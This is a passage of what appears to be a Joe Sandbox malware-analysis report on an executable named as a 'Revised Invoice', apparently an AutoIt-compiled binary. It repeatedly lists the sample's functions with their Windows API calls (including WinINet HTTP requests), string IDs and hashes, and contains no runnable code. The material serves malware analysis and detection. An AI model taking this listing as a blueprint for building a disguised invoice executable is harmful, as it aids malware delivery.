                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                              • String ID: <$@
                              • API String ID: 2417854910-1426351568
                              • Opcode ID: 024707e8d0be736fd9aee974053134abdf34597ecb22147b7e98c4ffc578353a
                              • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                              • Opcode Fuzzy Hash: 024707e8d0be736fd9aee974053134abdf34597ecb22147b7e98c4ffc578353a
                              • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                              APIs
                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                              • String ID:
                              • API String ID: 3705125965-3916222277
                              • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                              • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                              • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                              • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                              APIs
                              • GetMenuItemInfoW.USER32 ref: 0045FAC4
                              • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                              • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Menu$Delete$InfoItem
                              • String ID: 0
                              • API String ID: 135850232-4108050209
                              • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                              • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                              • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                              • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                              APIs
                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                              • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Window$Long
                              • String ID: SysTreeView32
                              • API String ID: 847901565-1698111956
                              • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                              • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                              • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                              • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                              APIs
                              • LoadLibraryA.KERNEL32(?), ref: 00434B10
                              • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                              • FreeLibrary.KERNEL32(?), ref: 00434B9F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Library$AddressFreeLoadProc
                              • String ID: AU3_GetPluginDetails
                              • API String ID: 145871493-4132174516
                              • Opcode ID: eeab42aefd2d36d06d7687f66def4b4fc74e6333f2f3c4216b61849e5f0d6007
                              • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                              • Opcode Fuzzy Hash: eeab42aefd2d36d06d7687f66def4b4fc74e6333f2f3c4216b61849e5f0d6007
                              • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                              APIs
                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: MessageSend$Window
                              • String ID: SysMonthCal32
                              • API String ID: 2326795674-1439706946
                              • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                              • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                              • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                              • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                              APIs
                              • DestroyWindow.USER32(00000000), ref: 00450A2F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: DestroyWindow
                              • String ID: msctls_updown32
                              • API String ID: 3375834691-2298589950
                              • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                              • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                              • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                              • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: $<
                              • API String ID: 4104443479-428540627
                              • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                              • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                              • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                              • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: ErrorMode$DiskFreeSpace
                              • String ID: \VH
                              • API String ID: 1682464887-234962358
                              • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                              • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                              • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                              • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: ErrorMode$DiskFreeSpace
                              • String ID: \VH
                              • API String ID: 1682464887-234962358
                              • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                              • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                              • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                              • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: ErrorMode$DiskFreeSpace
                              • String ID: \VH
                              • API String ID: 1682464887-234962358
                              • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                              • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                              • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                              • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                              • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: ErrorMode$InformationVolume
                              • String ID: \VH
                              • API String ID: 2507767853-234962358
                              • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                              • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                              • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                              • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                              • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: ErrorMode$InformationVolume
                              • String ID: \VH
                              • API String ID: 2507767853-234962358
                              • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                              • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                              • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                              • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                              APIs
                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                              • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: MessageSend
                              • String ID: msctls_trackbar32
                              • API String ID: 3850602802-1010561917
                              • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                              • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                              • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                              • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                              APIs
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                              • String ID: crts
                              • API String ID: 943502515-3724388283
                              • Opcode ID: 529e37b86e0cb06f9ed43835dc92f00344189a4a835cae890eb44c126e03fe94
                              • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                              • Opcode Fuzzy Hash: 529e37b86e0cb06f9ed43835dc92f00344189a4a835cae890eb44c126e03fe94
                              • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                              • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                              • SetErrorMode.KERNEL32(?), ref: 0045D35C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: ErrorMode$LabelVolume
                              • String ID: \VH
                              • API String ID: 2006950084-234962358
                              • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                              • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                              • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                              • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                              APIs
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • GetMenuItemInfoW.USER32 ref: 00449727
                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                              • DrawMenuBar.USER32 ref: 00449761
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
